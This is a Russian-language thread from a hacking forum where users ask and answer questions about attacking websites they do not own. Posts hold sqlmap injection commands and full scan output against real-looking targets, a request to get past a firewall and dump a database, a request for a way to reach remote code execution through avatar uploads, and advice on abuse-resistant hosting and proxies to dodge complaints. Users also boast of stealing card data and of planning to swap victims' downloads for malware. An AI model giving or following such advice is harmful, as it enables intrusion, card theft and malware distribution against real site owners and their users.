• XSS.stack #1 – первый литературный журнал от юзеров форума

[web-hacking] Ваши вопросы

Отслеживать
Пожалуйста, обратите внимание, что пользователь заблокирован
Подскажите, увидел в пруфе эксполита sqlmap -c woo.conf --level 5 -risk 3. Что это за конфиг и как он выглядеть должен? Что имел ввиду автор эксполита?
 
Пожалуйста, обратите внимание, что пользователь заблокирован
beautyandwealth сказал(а):
А транзы на таких сайтах вообще есть? А так то очень хорошо и интересно что много шопов которые можно ломануть... а то меня тут напугали что за 3 месяца нихрена не насканили дырок, только время потратили, хотя возможно это просто специально так сказали что бы я не лез в тему))) но другие ведь хакают как то! Чем я то хуже? ... Добывать карты это моя мечта, причём был уже опыт... ломанул как то базу без цвв на 1к кредиток... они были даже не зашифрованы... Спасибо за ответ кстати.

UPD:

А какой сканер уязвимостей лучше всего юзать?
У меня кстати подобное стремление, только не шопы, а какие-нибудь даунлауд ресурсы дырявые находить, ну или же просто что-то скачиваемое с ресурса, чтобы на своего зверя подменивать.
Вопрос также, к опытным, как быстро админ замечает такие изменения, и замечают ли вообще?
 
Вопросы к знатокам и старожилам форума. SQLMAP не удалось получить отпечаток внутренней системы управления базой данных.
При сканировании OWASP ZAP, выдало SQL уезвимости в MsSQL, Oracle, PostgreSQL и просто SQL-иньекция.
Вопрос в следующем: как правильно в SQLMAP прописать команды и как её лучше определить на ваш взгляд? За ранее всем благодарен.
В SQLMAP я закинул просто SQL-иньекцию.

sudo sqlmap -u "https://Таргет/?p=451'+OR+'1'='2'+--+" -p "p" --data="451' OR '1'='2' -- " --technique=B --level 5 --risk 3 --random-agent -o -b -f -v 5 --batch --dbs --tamper=luanginx

[02:08:17] [DEBUG] resuming configuration option 'code' (403)
[02:08:17] [WARNING] the back-end DBMS is not MySQL
[02:08:17] [INFO] testing Oracle
[02:08:17] [WARNING] the back-end DBMS is not Oracle
[02:08:17] [INFO] testing PostgreSQL
[02:08:17] [WARNING] the back-end DBMS is not PostgreSQL
[02:08:17] [INFO] testing Microsoft SQL Server
[02:08:17] [WARNING] the back-end DBMS is not Microsoft SQL Server
[02:08:17] [INFO] testing SQLite
[02:08:17] [WARNING] the back-end DBMS is not SQLite
[02:08:17] [INFO] testing Microsoft Access
[02:08:17] [WARNING] the back-end DBMS is not Microsoft Access
[02:08:17] [INFO] testing Firebird
[02:08:17] [INFO] confirming Firebird
[02:08:17] [WARNING] the back-end DBMS is not Firebird
[02:08:17] [INFO] testing SAP MaxDB
[02:08:17] [WARNING] the back-end DBMS is not SAP MaxDB
[02:08:17] [INFO] testing Sybase
[02:08:17] [WARNING] the back-end DBMS is not Sybase
[02:08:17] [INFO] testing IBM DB2
[02:08:17] [WARNING] the back-end DBMS is not IBM DB2
[02:08:17] [INFO] testing HSQLDB
[02:08:17] [INFO] confirming HSQLDB
[02:08:17] [WARNING] the back-end DBMS is not HSQLDB
[02:08:17] [INFO] testing H2
[02:08:17] [WARNING] the back-end DBMS is not H2
[02:08:17] [INFO] testing Informix
[02:08:17] [WARNING] the back-end DBMS is not Informix
[02:08:17] [INFO] testing MonetDB
[02:08:17] [WARNING] the back-end DBMS is not MonetDB
[02:08:17] [INFO] testing Apache Derby
[02:08:17] [WARNING] the back-end DBMS is not Apache Derby
[02:08:17] [INFO] testing Vertica
[02:08:17] [WARNING] the back-end DBMS is not Vertica
[02:08:17] [INFO] testing Mckoi
[02:08:17] [WARNING] the back-end DBMS is not Mckoi
[02:08:17] [INFO] testing Presto
[02:08:17] [WARNING] the back-end DBMS is not Presto
[02:08:17] [INFO] testing Altibase
[02:08:17] [WARNING] the back-end DBMS is not Altibase
[02:08:17] [INFO] testing MimerSQL
[02:08:17] [WARNING] the back-end DBMS is not MimerSQL
[02:08:17] [INFO] testing CrateDB
[02:08:17] [WARNING] the back-end DBMS is not CrateDB
[02:08:17] [INFO] testing Cubrid
[02:08:17] [WARNING] the back-end DBMS is not Cubrid
[02:08:17] [INFO] testing InterSystems Cache
[02:08:17] [WARNING] the back-end DBMS is not InterSystems Cache
[02:08:17] [INFO] testing eXtremeDB
[02:08:17] [WARNING] the back-end DBMS is not eXtremeDB
[02:08:17] [INFO] testing FrontBase
[02:08:17] [WARNING] the back-end DBMS is not FrontBase
[02:08:17] [INFO] testing Raima Database Manager
[02:08:17] [WARNING] the back-end DBMS is not Raima Database Manager
[02:08:17] [INFO] testing Virtuoso
[02:08:17] [INFO] confirming Virtuoso
[02:08:17] [WARNING] the back-end DBMS is not Virtuoso
[02:08:17] [CRITICAL] sqlmap was not able to fingerprint the back-end database management system
[02:08:17] [WARNING] HTTP error codes detected during run:
403 (Forbidden) - 1 times
 
Тестирую таргет, есть загрузка аватара
Можно грузить что угодно, название и расширение файла ставит сам сервер. Какое расширение поставит не зависит от того, какое мы дадим или от Content-Type, который мы задаем. Если я правильно понял, то там идет guessExtension. В зависимости от самого контента ставится расширение, и скорее он работает по вайтлисту, в котором нет php. Если скормить php то файл будет таким - filename. (без расширения). Пробовал также загрузить разные пнг, жпеги с пхп кодом внутри и двойным расширением, грузится, но файл не работает потому что расширение идет чисто jpg или png. Есть возможность грузить .html,.py,.svg,.xml. Подскажите, что можно сделать с такими форматами файлов? цель - rce.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Обязательно ли под burp покупать сервак для скана? Или можно со своего компа? И если обязательно сервак то обязательно ли он должен быть антиарбузовый? Так же интересует можно ли сканить бурпом тупо через носок тора или это очень не секурно? Или можно ли сканить через обычные платные носки которые не ведут логов? Или они (что тор, что носки) такое просто не выдержат?
 
linjuh сказал(а):
Тестирую таргет, есть загрузка аватара
Можно грузить что угодно, название и расширение файла ставит сам сервер. Какое расширение поставит не зависит от того, какое мы дадим или от Content-Type, который мы задаем. Если я правильно понял, то там идет guessExtension. В зависимости от самого контента ставится расширение, и скорее он работает по вайтлисту, в котором нет php. Если скормить php то файл будет таким - filename. (без расширения). Пробовал также загрузить разные пнг, жпеги с пхп кодом внутри и двойным расширением, грузится, но файл не работает потому что расширение идет чисто jpg или png. Есть возможность грузить .html,.py,.svg,.xml. Подскажите, что можно сделать с такими форматами файлов? цель - rce.

hacker_cc сказал(а):
Обязательно ли под burp покупать сервак для скана? Или можно со своего компа?
Можно со своего, только бутылку рядом приготовить надо, от шампанского.

hacker_cc сказал(а):
И если обязательно сервак то обязательно ли он должен быть антиарбузовый?
Антиарбузный разумеется. Ни кому не понравится что их сканят, будут абузить, строчить хостеру письма с логами твоего скана.

hacker_cc сказал(а):
Так же интересует можно ли сканить бурпом тупо через носок тора или это очень не секурно?
Это очень медленно и большая вероятность false positive/negative.

hacker_cc сказал(а):
Или можно ли сканить через обычные платные носки которые не ведут логов?
Можно через приватные быстрые соксы/хттп, но тут палка о двух концах: либо тебя забанят на сервисе где ты их арендуешь (если правилами сервиса запрещены сканы/взломы и прочая х#йня), либо так же как на сервер полетят абузы и продавец (сервис) проксей попросит на выход, в том случае если ему не по#уй на эти самые абузы. Когда я активно и массово сканил - юзал абузоустойчивые сервера, предварительно согласовывая мои действия с хостером. Сканил без проксей, прямо с сервера. Каждую неделю переезд на новую AS (больше не из-за абуз, а из-за своей ебанутости и паранойи).
 
Rocky-Balboa сказал(а):
sudo sqlmap -u "https://Таргет/?p=451'+OR+'1'='2'+--+" -p "p" --data="451' OR '1'='2' -- " --technique=B --level 5 --risk 3 --random-agent -o -b -f -v 5 --batch --dbs --tamper=luanginx
Зачем здесь подставлять 451' OR '1'='2' --? Это просто пейлоад сканнера для детекта самой скули. Почему только --technique=B? Часто, там где булеаен - бывают и другие векторы, в том числе юнион, тайм-базед и прочие. Просто пометь уязвимый параметр и прочекай все векторы:
Код: 
sudo sqlmap -u "https://Таргет/?p=451*" --level=5 --risk=3 --random-agent --dbs --tamper=luanginx -v3
Тампер luanginx так же можно убрать, если до конца не уверен в том что он там вообще нужен.
 
hacker_cc сказал(а):
Обязательно ли под burp покупать сервак для скана? Или можно со своего компа? И если обязательно сервак то обязательно ли он должен быть антиарбузовый? Так же интересует можно ли сканить бурпом тупо через носок тора или это очень не секурно? Или можно ли сканить через обычные платные носки которые не ведут логов? Или они (что тор, что носки) такое просто не выдержат?
Сервак не нужен, но скан и длительная работа с ним занимает много памяти. Если можешь под вирту 16гб дать - то ок.

Абузы будут на автосканах, но не много. Возможно одна-две залетит за месяц активной работы. В автосканах пользы практически никакой, разве что чисто посмотреть свой web на дырки, от скрипткиддис. К тому же он шлет очень много ненужных запросов(3-8к на 1 урл на скули), что по моим скромным представляем - пиздец. Ибо это все руками можно проверить в 10-15 запросов, но конечно не удобно.

Тор смысла нету, большинство нормальных ресов будут блочить его. Если поучиться на разных заброшенных - то да. Ну а сокс уже по ситуации, скан в основном идет через get/post запросы, большая пропускная способность канала там не нужна.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Satie сказал(а):
Сервак не нужен, но скан и длительная работа с ним занимает много памяти. Если можешь под вирту 16гб дать - то ок.

Абузы будут на автосканах, но не много. Возможно одна-две залетит за месяц активной работы. В автосканах пользы практически никакой, разве что чисто посмотреть свой web на дырки, от скрипткиддис. К тому же он шлет очень много ненужных запросов(3-8к на 1 урл на скули), что по моим скромным представляем - пиздец. Ибо это все руками можно проверить в 10-15 запросов, но конечно не удобно.

Тор смысла нету, большинство нормальных ресов будут блочить его. Если поучиться на разных заброшенных - то да. Ну а сокс уже по ситуации, скан в основном идет через get/post запросы, большая пропускная способность канала там не нужна.
Вопрос у новичка. По своему скромному опыту скажу, что автоскан и вправду плодов не приносил. Подскажи как лучше автоматизировать например поиск WordPressa версии < lastest с определенным плагином. А в wpscan можно сканить только один сайт(
 
PrikolBullet сказал(а):
Подскажи как лучше автоматизировать например поиск WordPressa версии < lastest с определенным плагином
Можешь напарсить себе WP сайтов, и прогнать через этот парсер https://github.com/WhatTheSlime/wpcheck на нужный плагин и его версию. А насчет версии самого двикжка WP думаю что то должно быть так же на гитхабе.
Если незнаешь чем напарсить списки сайтов могу посоветовать a-parser.com/.
 
hacker_cc сказал(а):
Под какую ось лучше выбрать сканеры уязвимостей? Всмысле лучше запускать их на винде или на линуксе?
Как тебе удобно так и запускай, но всегда надо под рукой иметь,и линукс, и винду
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Как сдампить базу? Ваф обрывает

Мой запрос ///
sqlmap -u "http://сайт.au:80/store-directory.php?showv=&f[]=2&b[]=-3487*&so=&show=30" --technique B --level=5 --risk=3 --random-agent --dbms=mysql -dbs -v3 --tamper "modsecurityzeroversioned.py"
/// Нашел базу, но ваф обрубил соединение. Как можно обойти?
 
Последнее редактирование:
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх